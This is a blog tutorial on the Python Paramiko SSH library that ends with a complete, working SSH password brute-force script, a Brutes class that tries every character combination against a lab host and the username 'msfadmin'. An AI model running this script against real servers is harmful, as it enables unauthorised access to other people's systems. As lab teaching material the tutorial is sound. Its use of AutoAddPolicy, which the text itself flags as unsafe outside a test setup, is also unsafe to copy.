Python SSH Bruteforcer

Posted on November 3, 2022 by Tom Rosenzweig


What is Paramiko?

Paramiko is a Python implementation of the SSH (Secure Shell) protocol that allows Python programs to establish secure connections to remote servers. Here is how to install Paramiko, followed by some basic usage instructions:

Installation

You can install Paramiko using pip, the package installer for Python. To install the latest version of Paramiko, run the following command:

pip install paramiko

Basic Usage

First, you need to import the Paramiko library in your Python script:

import paramiko

Establish a connection

Let’s use the Paramiko library to establish an SSH connection to a remote server.

The first step, as above, is to import the Paramiko library in your Python script.

import paramiko

Define connection parameters

Next, define the connection parameters like IP address, username, and password of the remote server you want to connect to.

ip = '192.168.198.136'
username = 'ubuntu'
password = 'pa$$w0rd'
timeout = 5

In this example, we are using IP address 192.168.198.136 with ubuntu as the username and pa$$w0rd as the password. We are also setting a timeout value of 5 seconds.

Set up the SSH client

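Create an instance of the SSHClient class and call its set_missing_host_key_policy() method with an AutoAddPolicy instance. With this policy, the client accepts the key of any host it has not seen before and adds it to its set of known host keys without asking. That is convenient in a lab, but it skips host key verification on first contact, so a machine in the middle can present its own key unnoticed. Outside a test setup, load the known host keys with load_system_host_keys() and keep Paramiko’s default RejectPolicy.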

client_policy = paramiko.AutoAddPolicy()
client = paramiko.SSHClient()
client.set_missing_host_key_policy(client_policy)

Connect to the remote server

Use the connect() method of the SSH client instance to establish an SSH connection with the remote server.

client.connect(ip, username=username, password=password, timeout=timeout)

In this example, we are passing the IP address, username, password, and timeout value to the connect() method.

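connect() raises an exception if the connection or the authentication fails, so reaching the next line means the connection has been established successfully. Finally, print the SSH client object to confirm the script got this far.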

print(client)

Close the connection

After you are finished with the connection, you should close it to free up system resources.

client.close()

Bruteforce SSH

This is an example of a brute force attack using the Paramiko library to attempt to log in to an SSH server. The script creates a client object, defines a Brutes class that generates password guesses, and tries to connect to the SSH server using each password guess until the correct one is found.

Here are the steps to understand this script:

Libraries

import itertools as it
import string
from utils import timefunc
import paramiko

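This code imports the necessary libraries: itertools, string, paramiko, and timefunc from the utils module. The utils module is a helper that is not shown on this page; timefunc is used below as a decorator on crackit.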

Define the create_client function

def create_client():
    client = paramiko.SSHClient()
    client_policy = paramiko.AutoAddPolicy()
    client.set_missing_host_key_policy(client_policy)
    return client

This function creates an SSH client object using the paramiko library, sets the client’s policy to auto-add any new host key, and returns the client object.

Define the Brutes class

class Brutes:
    def __init__(self, charset, length, ip):
        self.charset = charset
        self.length = length
        self.ip = ip
    
    @timefunc
    def crackit(self, username):
        client = create_client()
        for guess in self.guesses:
            try:
                print(guess)
                client.connect(self.ip, username=username, password=guess, timeout=0.5)
                print('The password is {}'.format(guess))
                return guess
            except paramiko.AuthenticationException as e:
                print('{} is not it.'.format(guess)) 
            finally:
                client.close()
    
    @property
    def guesses(self):
        for guess in it.product(self.charset, repeat=self.length):
            yield ''.join(guess)

This class takes in three arguments: the character set used to generate password guesses, the length of the password guesses, and the IP address of the target SSH server. The crackit method attempts to connect to the SSH server using each password guess generated by the guesses property until the correct password is found or all guesses have been exhausted. The guesses property generates all possible combinations of the characters in the character set for the given length.

Define the main function

def main():
    charset = 'aspeb'#'pqrstuvwxyzabcdefghijklmno'
    ip = '10.0.13.231'
    brute = Brutes(charset, 4, ip)
    password = brute.crackit(username='msfadmin')
    if password:
        print('Found {}'.format(password))

This function sets the character set, IP address, and length of the password guesses, creates a Brutes object, and attempts to crack the SSH password for the specified username. If the password is found, it is printed to the console.

Run the code

if __name__ == '__main__':
    main()